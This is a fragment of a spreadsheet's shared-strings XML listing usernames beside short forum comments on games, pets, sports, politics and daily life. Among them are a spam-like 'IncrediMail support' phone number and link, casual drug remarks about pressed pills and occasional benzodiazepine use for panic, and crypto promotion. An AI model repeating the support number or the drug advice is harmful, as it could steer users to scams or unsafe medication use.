  </si>
  <si>
    <t>Coca cola for sure. A can of coke tastes fine when you leave it open for an hour, Pepsi will be disgusting by then.</t>
  </si>
  <si>
    <t>Aramisua</t>
  </si>
  <si>
    <t>Please please please avoid offering to pay for everyone's food. Only consider doing it when there's a significant event like a thesis proposal that has been approved or your birthday. Filipinos have this habit of taking advantage of their more financially generous friends and will often find an excuse to score a free meal. Another thing that might endear you to us is if you incessantly offer us the snack you're currently eating. Haha. If I like the person, I make a show of being upset when they refuse. BUT DON'T IMMEDIATELY ACCEPT SNACKS THAT ARE OFFERED TO YOU because most Filipinos do that out of courtesy. My rule of thumb is if they offer it to me three times, I shall accept on the third offer. Another thing we love is when foreigners swear like locals. Haha. Perfect your putanginas and gagos and amaze your friends by how well you curse in Tagalog.</t>
  </si>
  <si>
    <t>pleasuregarden</t>
  </si>
  <si>
    <t>I feel like I just read this post out of my journal. I decided to put my 3yo cane corso/pit to rest in March after a 2 year long battle w idiopathic epilepsy. I miss him and think ab him everyday. He was a huge presence in my life, and now not having him I feel empty. However, I do not miss washing his beds, the couches, the carpets 3-10 times a day bc of loss of bladder control during seizures. I do not miss flinching at the normal sound of paws scratching the tile that to an epi parent is more closely related to the beginning of a seizure. I do not miss the $1500 vet trips to get the clusters to stop. I do not miss having to hold up my 125lb dog while he uses the bathroom bc the new meds he started have him so heavily sedated. I do not miss waking up every time I heard his collar in the night. I do not miss hearing the cries of my sweet boy during a seizure and literally being able to do nothing ab it. As I’m sure you can relate, making the decision to put down my boy was the hardest thing I’ve ever done. In the back of my mind I couldn’t help but think “what if next time it’s different.” I finally feel at peace w myself for letting him go and know that it was absolutely for his best. He is so much better off not dealing w that devil of a disease. Sending hugs friends. It will get better.</t>
  </si>
  <si>
    <t>polarbearik</t>
  </si>
  <si>
    <t>That got a snort out of me lol ty</t>
  </si>
  <si>
    <t>im___new___here</t>
  </si>
  <si>
    <t>he wasnt trolling hes just a really bad GM</t>
  </si>
  <si>
    <t>josephalbright1</t>
  </si>
  <si>
    <t>I'm pretty sure you just told me to masturbate.</t>
  </si>
  <si>
    <t>Goldabetyp</t>
  </si>
  <si>
    <t>Incredimail service is a godd platform for easily transfer and communicate the topic of business, personal and professional. It is a user- freiendly, and powerful secure in your systems. Incredimail service is totally free and no other brand can perform like this email service. Who have used Incredimail service with long time, they are fully enjoy about this service. Incredimail have good features so that mostly person like this service. But some time users faced some technical issues and they feel big problems about that. IncrediMail Technical Support Number always open for the customer help who need about email issues solutions. Only just dial our toll-free number +1-833-284-2444 and get connecting with email expert. https://www.contactxpert.com/incredimail-support-number.html</t>
  </si>
  <si>
    <t>Karkava</t>
  </si>
  <si>
    <t>I hope that the GOP isn't that clever.</t>
  </si>
  <si>
    <t>Calipacks420</t>
  </si>
  <si>
    <t>Don’t take these unless they’re bright pink with specs. These tested good but aren’t as strong as the bright pink which I believe are the real cp supremes</t>
  </si>
  <si>
    <t>GiantZombie</t>
  </si>
  <si>
    <t>I used to take my grandmother to her chemo appointments years ago and after almost a year they were really starting to take a toll on her, but she still loved to go shopping. So around Christmas my mom decided to come with us one day so we could all go out to eat and take her to the mall to buy some gifts afterwards if she was feeling up for it (she absolutely was). As we were walking through the mall I could tell she was starting to get tired about an hour into it and I was about to suggest we head home for the night when out of nowhere this man dressed as Santa came up behind us, tapped her on the shoulder, told her she had been a (very good girl) this year, gave her a piece of candy, and then walked away. I swear on my life I had never seen that woman light up like she did in that moment and as I turned around to go find and thank him, he was just *fucking gone*. I walked around that mall for another hour trying to find him and he had completely vanished. I think that was the happiest I saw her in the year before she passed, and I'll always be grateful for it. Wherever you're at Mall Santa, you mysterious son of a bitch. Thank you.</t>
  </si>
  <si>
    <t>swiss_k31</t>
  </si>
  <si>
    <t>It's worth it. The matches are great, too</t>
  </si>
  <si>
    <t>theme park joe</t>
  </si>
  <si>
    <t>Waffle-Stomper said: Possibly during that press conference. It's in projected list of announcements via the link Click to expand... Click to shrink... Yeah, I’ve heard for a bit it’s still on for 2019 up until recently.</t>
  </si>
  <si>
    <t>MrGoodFridays</t>
  </si>
  <si>
    <t>Bruh so are they gonna just give up after every DLC 4 or what fuck this im done, Im getting a PC to play custom zombies</t>
  </si>
  <si>
    <t>rationallunatic</t>
  </si>
  <si>
    <t>It's a flagship exclusive game focused on single-player that's been hyped up.</t>
  </si>
  <si>
    <t>DNBBEATS</t>
  </si>
  <si>
    <t>Bustin in is the Avalanche thing to do.</t>
  </si>
  <si>
    <t>basnyder77</t>
  </si>
  <si>
    <t>Bruh literally that’s what they should do. There’s no reason whatsoever to impeach Trump.</t>
  </si>
  <si>
    <t>CookieMan0</t>
  </si>
  <si>
    <t>They kept him around specifically because he wasn't competitive. Ferrari has always been about the distinct #1-#2 driver dynamic.</t>
  </si>
  <si>
    <t>bkervaski</t>
  </si>
  <si>
    <t>Quote: The installing mechanic adds only a power lead. Doesn't it also need a manifold pressure line?</t>
  </si>
  <si>
    <t>BioFlashDG</t>
  </si>
  <si>
    <t>r/DivineGamingPhotos Lost on mars for me just really enjoyed the atmosphere it put us in and the ability to have more movement options</t>
  </si>
  <si>
    <t>marshalltheshow19</t>
  </si>
  <si>
    <t>Let's face the truth, Cashman will lead us along but he won't trade for a starter With this staff we will get bounced in the 1st round</t>
  </si>
  <si>
    <t>snakey_snakerson</t>
  </si>
  <si>
    <t>I used to work in a decently size sex shop(not a US national chain) and I’m curious of what y’all wanna ask about it or clear up misconceptions of women working in the sex industry</t>
  </si>
  <si>
    <t>leumas9</t>
  </si>
  <si>
    <t>As a solicitor who has dealt with sales of property where there is an estate agent involved I can second this that it is much easier from my perspective too if I am dealing directly with the client rather than a middle man estate agent.</t>
  </si>
  <si>
    <t>MxP1nk</t>
  </si>
  <si>
    <t>It’s not? That’s listed as trivia on the IMDb page.</t>
  </si>
  <si>
    <t>Warpshard</t>
  </si>
  <si>
    <t>You can get your guild to mass-report your name as offensive and get a free name change, if you're so inclined.</t>
  </si>
  <si>
    <t>DoubleStuffed25</t>
  </si>
  <si>
    <t>Typical. Can’t argue the facts so the report. What ban though?</t>
  </si>
  <si>
    <t>Lead Sales Associate</t>
  </si>
  <si>
    <t>for more than a year Pros Great training Discount services Good hours Management is fairly decent Cons Pay changes a lot Commission plans change every month</t>
  </si>
  <si>
    <t>Dopaminum</t>
  </si>
  <si>
    <t>Is this Olsztyn?</t>
  </si>
  <si>
    <t>kittenmommy</t>
  </si>
  <si>
    <t>No direct linking to other subreddits, please. Thanks!</t>
  </si>
  <si>
    <t>hunnybunchesofhoes</t>
  </si>
  <si>
    <t>Tbf, every single other houseguest is also up Christie’s ass so that can’t be a deciding factor in much anymore :\</t>
  </si>
  <si>
    <t>Fortress05</t>
  </si>
  <si>
    <t>Showers my record for a full shower is 3.58min</t>
  </si>
  <si>
    <t>Sonks_92</t>
  </si>
  <si>
    <t>You look much happier and more toned. Good job for not giving up!</t>
  </si>
  <si>
    <t>kgb725</t>
  </si>
  <si>
    <t>@banecapital said: @socajunkie : @faradaysloth : Batista and Rey are jobbers just like Triple H used to be until semi-retiring just like his buddy Shawn Michaels. Rey is still wrestling full-time at the same age where Shawn Michaels had Undertaker end his career while Batista should return by fans chanting his name during Lesnar's rivalry with Seth Rollins just like they were cheering for Goldberg when the Beast Incarnate was feuding Seth's friend Roman Reigns. Are you delusional ? Who got pinned by Batista at wrestlemania ?</t>
  </si>
  <si>
    <t>katieknj</t>
  </si>
  <si>
    <t>Wouldn’t this get the big deduction for only using one hand?</t>
  </si>
  <si>
    <t>PatchWornTime</t>
  </si>
  <si>
    <t>Yea the main photo is from the bape store you idiot. I dont need a “tag” my name is more than enough.</t>
  </si>
  <si>
    <t>GrainOfSlaw</t>
  </si>
  <si>
    <t>Just built my first PC</t>
  </si>
  <si>
    <t>NightDwella</t>
  </si>
  <si>
    <t>not much value keeping your sentry alive unless they have invis items on their team but if you kill the sent, it will disappear off their minimap and they would know you're in that area with true sight.</t>
  </si>
  <si>
    <t>staedtler2018</t>
  </si>
  <si>
    <t>The person who made this thread didn't cheat. They said something inappropriate to their wife's friend while intoxicated.</t>
  </si>
  <si>
    <t>Shamalama_D1ngD0ng</t>
  </si>
  <si>
    <t>Grate cheese, mix with fresh garlic, place clumps on a cookie sheet and bake. Cheesy garlic "chips" are almost as delicious as garlic bread.</t>
  </si>
  <si>
    <t>Lazer_blade</t>
  </si>
  <si>
    <t>I came instantly and my cousin got mad and left</t>
  </si>
  <si>
    <t>ComandoBunny</t>
  </si>
  <si>
    <t>You will need to update the bios using your 2600x and then hopefully it should work fine</t>
  </si>
  <si>
    <t>DildoPolice</t>
  </si>
  <si>
    <t>Ok I’m here what’s going on?</t>
  </si>
  <si>
    <t>Kocytean</t>
  </si>
  <si>
    <t>Bristol - 15 Durham - 30 Exeter - 30 Manchester - 20 Newcastle - 25 Nottingham - 40 (-5) Oxford - 50 Warwick - 35</t>
  </si>
  <si>
    <t>oapster79</t>
  </si>
  <si>
    <t>If they teamed up they'd be unstoppable!</t>
  </si>
  <si>
    <t>KomradeKat007</t>
  </si>
  <si>
    <t>I'd like to know as well. I'm sorry for the necro, but I haven't seen a single thing online about the refresh rate of this monitor, and I'm getting desperate.</t>
  </si>
  <si>
    <t>HotspurJr</t>
  </si>
  <si>
    <t>I feel like this is a really counterproductive way to think about things. You should have a script and a pitch bible - that is to say, a 3-8 page document detailing the world of the story, character arcs, and a sense of where the show goes in terms of future episodes and future seasons. And that's really it. But honestly unless you've written a professional-quality pilot, the bible is a waste of your time. You should be writing more pilots, maybe writing and shooting a short or two. If you're brand new at this, the goal shouldn't be getting someone on air in a year. More realistic is having something on air in a decade.</t>
  </si>
  <si>
    <t>RangerManSam</t>
  </si>
  <si>
    <t>If nothing else she has access to warp and a high magic growth so bishop/gremory Lysithea can airdrop someone for you. Need Ferdinand to reach a enemy but they're on top of a staircase, here comes Lysithea with the warp staff. It was also fun using her and Linhardt to abuse warp to clear Edelgard/side chapter 1 in one turn.</t>
  </si>
  <si>
    <t>Father-Shaqos</t>
  </si>
  <si>
    <t>Forehead and hair reveal, one updoot for right eye</t>
  </si>
  <si>
    <t>InDy82306</t>
  </si>
  <si>
    <t>Happy cake day</t>
  </si>
  <si>
    <t>B_Hound</t>
  </si>
  <si>
    <t>Ha always good to hear! Always good when a place can bounce back.</t>
  </si>
  <si>
    <t>iwannabefreddieHg</t>
  </si>
  <si>
    <t>Ooooo I know Matteo and he is so very nice. Not surprised at all.</t>
  </si>
  <si>
    <t>walid83920</t>
  </si>
  <si>
    <t>I bet you're the best man ever :)</t>
  </si>
  <si>
    <t>ishamehra_</t>
  </si>
  <si>
    <t>According to me, women empowerment just gives the capacity or power to resist discrimination imposed by the male-dominated society. Women empowerment enables women to organize themselves increase their self-reliance and it provides greater autonomy and not to create problem. Take women empowerment in a positive way. [Look at examples like Varha Rao joins as CEO at startup Nurx](https://www.allabtyou.com/women-empowerment-stories-nurx/).</t>
  </si>
  <si>
    <t>Tireseas</t>
  </si>
  <si>
    <t>Works for me. Stafford's good people and you guys would get to play two games year each in sunny Florida.</t>
  </si>
  <si>
    <t>ScoliOsys</t>
  </si>
  <si>
    <t>I feel like some of these quotes should be set to that Gaston song.</t>
  </si>
  <si>
    <t>MistbornSynok</t>
  </si>
  <si>
    <t>Not a fan of the first shot/burst recoil for how little damage it does with a suppressor on it.</t>
  </si>
  <si>
    <t>holangjai</t>
  </si>
  <si>
    <t>I love matching ink and pens. Beautiful orange colors.</t>
  </si>
  <si>
    <t>RedeyedRider</t>
  </si>
  <si>
    <t>Tuskegee experiments. Operation northwoods. The list goes on. All facts</t>
  </si>
  <si>
    <t>matt</t>
  </si>
  <si>
    <t>Cane from a wreck motor box turbo etc as is</t>
  </si>
  <si>
    <t>Aidysnap1</t>
  </si>
  <si>
    <t>Honestly I think the best way to experience the magic of these games is to go in blind and fumble you way to glory, slowly picking up things about the game.</t>
  </si>
  <si>
    <t>Zeleate</t>
  </si>
  <si>
    <t>I utterly despise that they believe they *have* to include romance in any way just because she/he is single. It send the awful message that men and women cannot be friends, when friendship is even more important than romance, being, in fact, the fundation of an erotic relationship. It's really an awful way of thinking.</t>
  </si>
  <si>
    <t>Fiendish_Fiend</t>
  </si>
  <si>
    <t>Quest rogue takes over the tempo scene to the point where token decks will be a must to not lose as much momentum to their new hero power. Control warriors stop running bombs so that it's harder for priest to fulfill their quest. Perhaps they even stop hitting face and let fatigue do the work for them. Quest paladin will be great at making a sticky board but still wont be the best deck to use for its play style. Kobold Sandtrooper and Dinotamer Brann will help push face hunter, but it wont take off until we lose the superior mech/bomb package and the dr. boom hero card in the set rotation of 2020. Mage will keep the same archetypes as RoS but will run ancient mysteries and sky temple to combo with mana cyclone. Quest druid will have ridiculous late game potential and might be able to fight on even terms against control warrior assuming they don't get loads of omega devastators and tomb wardens. Zoolock gets better but doesn't really take off. Priest will be scary for the first stretch of the meta, but eventually people learn how to best deal with them and the class will be tier 2 at best. Shaman will be able to run an aggressive deck that runs either murlocs or a murloc/totem hybrid and will be even stronger than they were in RoS.</t>
  </si>
  <si>
    <t>Athazel</t>
  </si>
  <si>
    <t>Good lad, exactly. I wish people considered it as it's own thing. Games weren't completely faithful neither, they had tons of made up stuff. So might the show.</t>
  </si>
  <si>
    <t>ZachDaChampion</t>
  </si>
  <si>
    <t>Hey could you get your wife to say that about me please? Also that I don't be a millionaire</t>
  </si>
  <si>
    <t>chrysotileman</t>
  </si>
  <si>
    <t>STO Platform OWN (CHX) Could Be The Blockchain Gem You’ve Been Looking For</t>
  </si>
  <si>
    <t>Melissa</t>
  </si>
  <si>
    <t>Baby moschino summer romper &amp; bib. Size 3-6 months. Purchased for 110$. Worn a few times. In excellent condition.</t>
  </si>
  <si>
    <t>Anon47__</t>
  </si>
  <si>
    <t>People say in posts here that they have never had a relationship or tell that they are virgins and never kissed a girl or talked to a girl before but then in the end they say that their old beautiful girl popped up and that ruins my day by knowing that , that guy isn’t as miserable as me at my age . Im 18 btw but i used to have an amazing life till the age of 14 and I could have had a gf at that time but i never have had an opportunity to get to know a girl or have a relationship, kiss her , tell her i love her or to even fight with her . ( i know fighting in relationships are bad but fights only happen when there is love between them ) . AM I THE ONLY PERSON IN THIS CENTURY TO NOT HAVE A GF ? I am worried cause i feel lonely again and i might relapse if i go in this condition... Anyways keep up the streak guys ...</t>
  </si>
  <si>
    <t>greenpill88</t>
  </si>
  <si>
    <t>~~Apologies~~ Congradulations for what you are about to see.</t>
  </si>
  <si>
    <t>HABSolutelyCrAzY</t>
  </si>
  <si>
    <t>Shopsmart_s-mart</t>
  </si>
  <si>
    <t>They have to get bullpen arms, there is no way they will be competing in October with that horrific pen.</t>
  </si>
  <si>
    <t>TOTALLYnattyAF</t>
  </si>
  <si>
    <t>For me, it would be a toss up between Link to the Past and FFIV. I especially like the FFIV complete series on PS Vita with the newly drawn sprites. A legendary story with so many memorable characters. One of the first of a genre which has grown by leaps and bounds.</t>
  </si>
  <si>
    <t>Sigh-Bapanada</t>
  </si>
  <si>
    <t>It feels a lot like you *are* justifying those former officers. Your argument is: “the cops may have done something horrible, but I can *imagine* people on the left doing something horrible, and since I’ve imagined it, the two sides are equal.” Impeachment + swearing is different than a cop threatening murder.</t>
  </si>
  <si>
    <t>Idealist</t>
  </si>
  <si>
    <t>Yes, you can. Try to find something to do outside of your school. Be creative with your ideas. You don't need to play sports if you're not good at it, not every student is an athlete. Although most colleges would like it if you're good at everything including sports but it's not necessary. You can join a book club or something else that's similar to your personal, academic hobby. Or you can get a part-time job to gain work experience before college. Many high school students do that in order to save some money before they enter college and also to gain work experience. When you apply to colleges, you can describe how it's like to work for the first time in your life and how hard the work can be. It's practical and the colleges will like it. You can write that in your college application essay too. That counts as another type of extracurricular activity.</t>
  </si>
  <si>
    <t>CheesyParmo</t>
  </si>
  <si>
    <t>Thankfully yes Can understand why when it failed that it caused an awful accident through the 14 inversions and the speed it goes it would’ve led to some bad injuries in a collision.</t>
  </si>
  <si>
    <t>That's a strange way to spell Shintel *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AyyMD) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>&gt;&gt;53630641 It's fun, until you run out. Then it's like you want to rip off your skin because of the panic. Better to just use benzos every once in awhile for panic</t>
  </si>
  <si>
    <t>Ashand11</t>
  </si>
  <si>
    <t>Yeah, rob has never really been good at realizing some of his storyline just realistically don’t make sense in real world scenarios</t>
  </si>
  <si>
    <t>Frost_999</t>
  </si>
  <si>
    <t>&gt; Just like when Clinton tried to get Lewinsky to pie, She got herself to pie!</t>
  </si>
  <si>
    <t>lilmeanie</t>
  </si>
  <si>
    <t>Who’s “we”? Disband the “government”? So you’re suggesting that the U.N. will pass resolutions declaring the Chinese government invalid? And that they will accept this? Or that a whole bunch of countries will agree to align militarily against China to topple their government and install some coalition based regime in its place? That sounds pretty unlikely.</t>
  </si>
  <si>
    <t>Scripturos</t>
  </si>
  <si>
    <t>Dear Bro, I completely understand your problem. Well, ofc there demons outside, but here is some psychology needed. Your brain has been "taught" by experience that PMO means satisfaction/relief=dopamine. The key is to teach your brain that PMO brings no more of such things and that you do not need them. If you change by learning/repeating the meaning of PMO in your head, then it looses its bliss which urges you and repeats itself in your head everytime you feel a bit down (even slightly). I recommend you cognitive-behavioral therapy approach. Even some consult may help.</t>
  </si>
  <si>
    <t>jackasaurusrexx</t>
  </si>
  <si>
    <t>When you’re in that situation and someone is just trying to be hospitable and ask if you want a drink. You politely decline and say you don’t want anything. They then say, “are you sure? Coffee? Tea? We’ve got soft drinks? Lemon and lime? Juice? A water?” I know they’re just being kind but it annoys me because I have said NO from the start. If I change my mind, I’ll let you know. Stop asking, leave me alone because it makes me feel like a jerk to keep saying no, no, no, no I’m fine thank you, no really I don’t want anything. Just take no for an answer.</t>
  </si>
  <si>
    <t>adrenalinesoup</t>
  </si>
  <si>
    <t>Must’ve taken a big ball of timey wimey yarn (this is adorable!)</t>
  </si>
  <si>
    <t>Mandalorian_GT</t>
  </si>
  <si>
    <t>The mujahedeen are not / were not Al Queda. Some of the members may have joined from one but more of the former fighters actually joined the NA against the Taliban.</t>
  </si>
  <si>
    <t>Cal3001</t>
  </si>
  <si>
    <t>You shift into lower gear, hang in that lower gear until you are ready to pass. Even if I’m driving a Tesla, I’m planning my passing well in advanced.</t>
  </si>
  <si>
    <t>Horusisalreadychosen</t>
  </si>
  <si>
    <t>Honestly I think that Yasuo Gragas game would have been fine if they hadn't greeded for kills on the 2nd dive. If they had just blasted plates off the tower they would've been in a great position to snowball. The first dive was just well played by the enemy, standing next to the wall to avoid the knockup.</t>
  </si>
  <si>
    <t>sunnyaloe</t>
  </si>
  <si>
    <t>I completely understand where you’re coming from and how frustrating it is to constantly hear “friendly suggestions”, especially when you’ve tried everything under the sun to achieve clear skin. Somewhat unrelated, but I dated a guy once who said almost the same thing to me; I had broken my nose, which destroyed my self esteem, and was looking to get surgery to correct the deviated septum. He said I shouldn’t get surgery because I would gain too much confidence and leave him (that’s exactly what ended up happening). Of course, he was an a-hole, so your situation is probably a lot different. But those types of comments aren’t okay. You deserve to feel confident, and you have every right to be ecstatic about finally being on track to working on something that has affected your self esteem for so long. Congratulations and best of luck to you.</t>
  </si>
  <si>
    <t>lonestriker</t>
  </si>
  <si>
    <t>Quote from: moreno7798 on 07/26/2019 04:37 am Quote from: lonestriker on 07/26/2019 04:34 am There were noticeable sparks flying in front of the three tanks during the hop. Not sure what material, but at a guess it was material from the quick-disconnects or chunks of the pad ablating (rebar?) Now imagine not one, not two, not three . . . .but 30 raptors going all at once. Let that sink in for a minute. Yeah, SH will be a monster once it launches, even with a reduced compliment of engines (19 at last tweet.) Luckily, SH will have a proper flame trench and water suppression system. SS Mk 1 will have 7 for sub-orbital and near-orbital tests. I can't imagine them doing those tests without a proper trench. Also, SS won't have any ground structures initially on either The Moon or Mars. It'll carve a massive crater in the loose soil on the moon, so it'll be interesting to see how they deal with unprepared surfaces in general.</t>
  </si>
  <si>
    <t>V8-Turbo-Hybrid</t>
  </si>
  <si>
    <t>Very rare to see this color</t>
  </si>
  <si>
    <t>quailmanmanman</t>
  </si>
  <si>
    <t>I’m almost certain my grandma thinks Al Kaida is a singular person. Like just one guy in Afghanistan.</t>
  </si>
  <si>
    <t>AlarmingPapaya</t>
  </si>
  <si>
    <t>Protein is needed for serotonin production. Many vitamins and minerals found plentifully in meat are vital for good brain health such as B12. They are all in the ideal form in meat, from plant sources everything must be converted to the right form (like beta carotene to vitamin A). This conversion rate varies from person to person and at its worst can be almost 0. There's a lot of information about this around. My mental health has been affected very positively by eating much more fatty meat, especially red meat.</t>
  </si>
  <si>
    <t>MinkaMouse</t>
  </si>
  <si>
    <t>Love this!</t>
  </si>
  <si>
    <t>hawkwings</t>
  </si>
  <si>
    <t>What's up with that jacket? Is she trying to cool off one tit?</t>
  </si>
  <si>
    <t>ChefWetBeard</t>
  </si>
  <si>
    <t>Take someone like George Hackenschmidt, [Wikipedia](https://en.m.wikipedia.org/wiki/George_Hackenschmidt). How much more impressive do you think he could look with modern cameras, modern nutrition, modern recovery techniques, etc. You put him in modern day, and I think we’d all be crying juice.</t>
  </si>
  <si>
    <t>cdoran09</t>
  </si>
  <si>
    <t>Delta Rae I can't wait to see the turnout for this one lmao, I know I won't be at this concert</t>
  </si>
  <si>
    <t>LoveMadi6799</t>
  </si>
  <si>
    <t>I spent the last few hours just knitting and chilling. It was really nice. I get paid tomorrow and I’m definitely looking forward to having some cash. I also found out someone in my house sold all my PS4 games (except for Minecraft which was safely in the PS4, so someone bought an empty cartridge), so I’m pretty upset. There’s no way to prove who did it or when, so that’s that, I’m just taking the anger out on the knitting needles. A blanket made with anger will be just as warm as one made with love. I’m looking forward to going into work tomorrow, I might also possibly have a date sometime this week...hopefully. QOTD pt 2: dinner was teriyaki chicken and buttered noodles</t>
  </si>
  <si>
    <t>Henryhooker</t>
  </si>
  <si>
    <t>Do it in a British accent too.</t>
  </si>
  <si>
    <t>mustache_ride_</t>
  </si>
  <si>
    <t>p.s: for a minute I thought you were a little troll cunt, but then I found the problem: https://www.reddit.com/r/uberdrivers/comments/cek3cl/dear_veteran_uber_drivers_what_is_your_best/eu3k6rk/?context=3 Uber is the devil, there you go!</t>
  </si>
  <si>
    <t>[Health] - UAB set to no longer accept UnitedHealthcare policyholders | Washington Times</t>
  </si>
  <si>
    <t>kristynaZ</t>
  </si>
  <si>
    <t>Lol what? So it's Ireland's fault because they are not a part of the UK? If this kind of attitude is widespread among your politicians, then no wonder you didn't reach any deal with Ireland. Did the UK even try? Talking it out with Ireland as an equal? Because you do realize that the EU woud drop any backstop requirement that second Ireland dropped it right? If the UK could just sit with all the relevant actors in the Northern Ireland and Ireland and come to an acceptable solution, then this whole thing could be solved. It's your fucking common border, it's not just their responsibility, it's just as much your responsibility. Only they happen to have the entire EU on their side, because they are a member state and you soon won't be. This is a situation that you caused, by having a referendum about an affair without considering how this affair might impact the delicate situation in Norhern Ireland and Ireland even though Norhern Ireland is a part of you own freaking country and Ireland is your freaking neighbour. But somehow you blame the EU for the situation? That's absurd.</t>
  </si>
  <si>
    <t>alicea</t>
  </si>
  <si>
    <t>Gigantic congratulations to you guys I invested in exact right time and now it's great to see my investment growing.</t>
  </si>
  <si>
    <t>wgkb5u</t>
  </si>
  <si>
    <t>"Men have to make the first move." This is in the context of relationships, not sex. I. hate. this.</t>
  </si>
  <si>
    <t>luketumber92</t>
  </si>
  <si>
    <t>I know I'm desperate for the truth it bothers me to my core</t>
  </si>
  <si>
    <t>I will be messaging you on [**2021-07-31 11:50:36 UTC**](http://www.wolframalpha.com/input/?i=2021-07-31%2011:50:36%20UTC%20To%20Local%20Time) to remind you of [**this link**](https://np.reddit.com/r/CFB/comments/ck090d/2020_4_rb_jaylan_knighton_commits_to_florida_state/evk1kfk/) [**CLICK THIS LINK**](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=Reminder&amp;message=%5Bhttps%3A%2F%2Fwww.reddit.com%2Fr%2FCFB%2Fcomments%2Fck090d%2F2020_4_rb_jaylan_knighton_commits_to_florida_state%2Fevk1kfk%2F%5D%0A%0ARemindMe%21%202021-07-31%2011%3A50%3A36) to send a PM to also be reminded and to reduce spam. ^(Parent commenter can ) [^(delete this message to hide from others.)](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=Delete%20Comment&amp;message=Delete%21%20ck090d) ***** |[^(Info)](https://np.reddit.com/r/RemindMeBot/comments/c5l9ie/remindmebot_info_v20/)|[^(Custom)](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=Reminder&amp;message=%5BLink%20or%20message%20inside%20square%20brackets%5D%0A%0ARemindMe%21%20Time%20period%20here)|[^(Your Reminders)](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=List%20Of%20Reminders&amp;message=MyReminders%21)|[^(Feedback)](https://np.reddit.com/message/compose/?to=Watchful1⊂ject=Feedback)| |-|-|-|-|</t>
  </si>
  <si>
    <t>ShneakySholidShnake</t>
  </si>
  <si>
    <t>Where did you get the name?</t>
  </si>
  <si>
    <t>geonational</t>
  </si>
  <si>
    <t>I assume it's popular because Brazil has very unequal land ownership system and very little direct taxes on land owners? The ugly part of anarcho-capitalism is that its theory of land tenure and 'physical removal' is used by fascists to recruit extremists and normalize genocide as eviction.</t>
  </si>
  <si>
    <t>erldn123</t>
  </si>
  <si>
    <t>She was in the last one too.... Also not that fit in the movies.</t>
  </si>
  <si>
    <t>N1njawaffle</t>
  </si>
  <si>
    <t>PSA To my fellow Australians: Ambulances aren't free in Australia and the rules/prices are determined by state. If I remember correctly they can be free if it classified as an emergency but if not you're looking at around a grand for the ride. Don't take my word at face value and lookup the laws for your state.</t>
  </si>
  <si>
    <t>MinecraftPotion</t>
  </si>
  <si>
    <t>One of these things is not like the other.</t>
  </si>
  <si>
    <t>KurtMcGurt_</t>
  </si>
  <si>
    <t>Collins</t>
  </si>
  <si>
    <t>Niterich</t>
  </si>
  <si>
    <t>From Wikipedia: "A flying wing is a tailless fixed-wing aircraft that has no definite fuselage." I'm sure you've seen the B-2 stealth bomber, where it's so flat it does look like a giant wing (or a boomerang)</t>
  </si>
  <si>
    <t>Ocbard</t>
  </si>
  <si>
    <t>The Milennium Falcon? No , the other one.</t>
  </si>
  <si>
    <t>darlingtwinklebum</t>
  </si>
  <si>
    <t>First night with our new kitten tonight but I'm unsure about what to do with her now we're off to bed. We've given her the kitchen as her space with all her bits in it. Should we shut her in the kitchen overnight so she's safe and with all her bits. Or do we let her roam? I'm worried she may cry.. do I ignore it if she does or do I go to her? I'm so confused! I don't want to do the wrong thing for her but I've read about bad habits and such. Any advice appreciated.</t>
  </si>
  <si>
    <t>BtheLee</t>
  </si>
  <si>
    <t>I really think the word should be spelled "wholistic" as the idea is to try to understand and incorporate all aspects of one certain idea, problem, situation, etc. Let's say i want to make a delicious tomato sauce, if i wanted to take a "wholistic" approach to my sauce i want to consider a few things, is it gonna be a beef or pork sauce, what kind of tomatoes should i be using, should i be using white or black pepper, am i to use dried or diced garlic. You want to consider every part of what you're doing in order to approach the situation the best.</t>
  </si>
  <si>
    <t>Artsen_Crafts</t>
  </si>
  <si>
    <t>It’s upsetting to me that “one of the good ones” has racial connotations. I grew up understanding it as a friendly lighthearted phrase to say about anybody, as in “Thanks for handing me my bag, you’re one of the good ones”. It had literally nothing to do with race, just humans in general. However if I say it to someone of a different race than me I can be accused of being a racist.</t>
  </si>
  <si>
    <t>young_loli_girl</t>
  </si>
  <si>
    <t>\[\[Marrow-Gnawer\]\] + \[\[Thrumming Stone\]\]</t>
  </si>
  <si>
    <t>7yearlurkernowposter</t>
  </si>
  <si>
    <t>Not sure how you would handle the spam but this could be interesting as a wiki.</t>
  </si>
  <si>
    <t>Sunflower011</t>
  </si>
  <si>
    <t>Machooma said: Posted 07/07/2019 I have around 50. I wash every three days and I’d rather have too many than run out. I have 25 cheeky wipes and a few random bamboo wipes from when I had my older son, then I have a few which I made out of old flannel pjs, and I have some cheap cotton baby flannels I bought from amazon. I store mine wet in a tub in solution that I make up with hot water, coconut oil and a squirt of baby wash. I usually just store two day’s worth so they don’t get musty. When I go out I take two per nappy, rung out so they’re damp, in a small wet bag. For newborn poo I’d probably take three per nappy just in case although it’d be a pretty bad nappy situation to warrant three wipes! Post weaning, I use loo roll to get the worst off, then I use the wipes to finish off. Dirty wipes just go in the wet bag with the dirty nappy. I guess that people who don’t use cloth nappies would need separate storage for dirty wipes, but if you’re using cloth nappies too it’s not necessary. If I’m out and I need to wipe my LO’s hands or face I will just use one of the clean nappy wipes. They get washed at 60, they’re perfectly clean. At home I have a stack of dry wipes I keep in the kitchen which I run under the tap when needed. I’m not fussy about separating nappy and hands/ face wipes, it’s just more convenient because we eat in the kitchen. Can I ask what coconut oil do you use please? I have just started using cheeky wipes with essential oils but my ds (dear son) is getting a sore bottom which he has never had before (hes 2 years old) x</t>
  </si>
  <si>
    <t>WinterVinestone</t>
  </si>
  <si>
    <t>I am so happy when people find the same love I did for the tower series. It really is a wealth of imaginative storytelling.</t>
  </si>
  <si>
    <t>RonaldRaingan</t>
  </si>
  <si>
    <t>Reminded me of Pipeline from Modern Warfare, what i consider to be the best CoD ever made. The maps where so good. Can't wait for this, it'll be the first CoD I've bought since MW3.</t>
  </si>
  <si>
    <t>ms traditional</t>
  </si>
  <si>
    <t>i do think that the first part of this version is "darker" due to the realism of the animals. i would question whether this is appropriate for small children. i'd stick with the animated form. this remake has its moments - but nothing can approach the theater production!</t>
  </si>
  <si>
    <t>eccolus</t>
  </si>
  <si>
